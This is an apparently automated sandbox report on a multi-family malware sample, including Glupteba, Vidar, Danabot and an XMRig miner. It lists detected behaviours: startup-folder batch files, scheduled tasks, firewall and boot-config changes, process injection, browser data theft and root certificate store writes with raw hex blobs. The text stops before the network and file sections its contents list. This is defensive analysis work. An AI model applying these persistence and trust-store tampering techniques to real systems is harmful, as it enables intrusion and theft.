Malware Analysis Report

2025-01-02 09:18

Sample ID 231004-1wt5pahc75
Target file
SHA256 8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Fabookie

Glupteba payload

Glupteba

Vidar

Danabot

Detect Fabookie payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Downloads MZ/PE file

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Stops running service(s)

Drops file in Drivers directory

Blocklisted process makes network request

.NET Reactor proctector

UPX packed file

Drops startup file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies system certificate store

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks processor information in registry

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-04 22:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-04 22:00

Reported

2023-10-04 22:03

Platform

win7-20230831-en

Max time kernel

18s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5KBrTyNqjkzkfvnblop9vXu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k4RZBA7IbOJzP9tFcB0Uxzr8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I9fjH7BPaqhRIbdsZsuw44gH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X2YqWH1H43WyVCsftFGf25fs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8Q07bsmA2SFivlZEMcwdn3hb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32QePm4KyaXGR23aqiWCYXU7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aqKNOYnM2WwyugEQZLP2WH2k.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\krf1bY6s7oSG5lwGiK0yR19v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfWzyh2UY8ErRZQrt8QdGnrZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFlDBBbXluGJT7fUQupu2wBz.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe N/A
N/A N/A C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2408 set thread context of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

